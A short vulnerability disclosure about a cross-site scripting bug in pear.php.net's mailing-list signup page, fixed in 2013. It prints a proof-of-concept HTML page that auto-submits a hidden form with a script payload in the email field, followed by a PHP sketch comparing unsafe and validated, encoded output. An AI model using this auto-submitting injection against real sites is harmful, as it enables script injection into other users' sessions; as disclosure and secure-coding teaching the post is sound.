A long time ago (28.06.2013) I found an XSS bug in http://pear.php.net/support/lists.php. The email parameter was neither validated nor sanitized, which resulted in XSS.
The proof of concept was:
<head>
<script src="http://code.jquery.com/jquery-1.10.1.min.js"></script>
</head>
<body>
<form method="post" action="http://pear.php.net/support/lists.php" id="form" style="display:none">
<input name="maillist[pear-dev]" type="radio" value="normal" checked>
<input type="text" name="email" size="30" value="<script>alert('xss');</script>">
<input type="submit" name="action" value="Subscribe">
</form>
</body>
<script>
$('input[name=action]').click();
</script>
Fixed 08.07.2013.
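
The missing validation and encoding for the email parameter, sketched as an added example (this is not the pear.php.net source, which the post does not show). The function names, the response markup and the sample addresses are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical handler code: stands in for whatever lists.php did with "email".

/** Vulnerable pattern: the submitted value is placed into the HTML response unchanged. */
function render_unsafe(string $email): string
{
    return "<p>Subscription request sent for $email</p>";
}

/** Hardened pattern: validate on input, then encode on output. */
function render_safe(string $email): string
{
    // 1. Validation: reject anything that is not a syntactically valid address.
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return '<p>Invalid e-mail address.</p>';
    }

    // 2. Output encoding: still required after validation, because a valid
    //    address may contain characters such as ' that matter in HTML contexts.
    $encoded = htmlspecialchars($email, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    return "<p>Subscription request sent for $encoded</p>";
}

// Constructed sample inputs; the second is the value used in the proof of concept.
$samples = [
    'dev@example.org',
    "<script>alert('xss');</script>",
    "o'brien+pear@example.org",
];

foreach ($samples as $sample) {
    echo "input : $sample\n";
    echo "unsafe: ", render_unsafe($sample), "\n";
    echo "safe  : ", render_safe($sample), "\n\n";
}
```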